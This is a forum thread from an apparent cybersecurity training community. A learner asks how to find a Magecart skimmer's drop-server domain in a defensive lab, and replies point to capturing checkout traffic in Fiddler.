Forum Discussion

GusC's avatar
GusC
Icon for Bronze III rankBronze III
2 months ago

Events & Breaches: Magecart Skimmer

Hello - I need a hand locating the domain. (Q7) 

I've found the name of the file that contains the skimmer then exported that. I have then opened that in a text editor and searched for "http://" and "https://" in the big chunk of text but nothing is matching. 

defensive cyber
  • ChrisWood's avatar
    ChrisWood
    2 months ago

    Once you finish the checkout, look for a request sent to another server with the unencrypted details. You can do this inside of Fiddler. Alternatively, you can search for the fake information you entered, which should help you find what you're looking for!

  • KieranRowley's avatar
    KieranRowley
    Icon for Community Manager rankCommunity Manager
    2 months ago

    Hi GusC I see there have been no replies on this one so far so I have forwarded your question to the lab author.

  • MadelineDadamio's avatar
    MadelineDadamio
    Icon for Community Support rankCommunity Support
    2 months ago

    Hi Gus! 

    Thank you for raising this! To locate the domain of the drop server, the user needs to navigate to the website and checkout using fake/random details. Then, you will be able to find the drop server domain used by the skimmer in Fiddler.

    Let me know if you have any additional questions. 

    • GusC's avatar
      GusC
      Icon for Bronze III rankBronze III
      2 months ago

      Hi Madeline - I had done that previously. I'm still stuck. 

      I went to checkout, then only when about to complete checkout with fake card data I launched fiddler to capture. Once checkout had completed I closed Firefox. Then exported all sessions as raw files then grepped on the results using 

      grep -Eorh 'https?://[^\s]+'

      None of the results match Q7. 

       

  • GusC's avatar
    GusC
    Icon for Bronze III rankBronze III
    29 days ago

    Got it now - thanks all - the answer was right in front of me, as usual. 

    • ChrisWood's avatar
      ChrisWood
      Icon for Immerser rankImmerser
      2 months ago

      Once you finish the checkout, look for a request sent to another server with the unencrypted details. You can do this inside of Fiddler. Alternatively, you can search for the fake information you entered, which should help you find what you're looking for!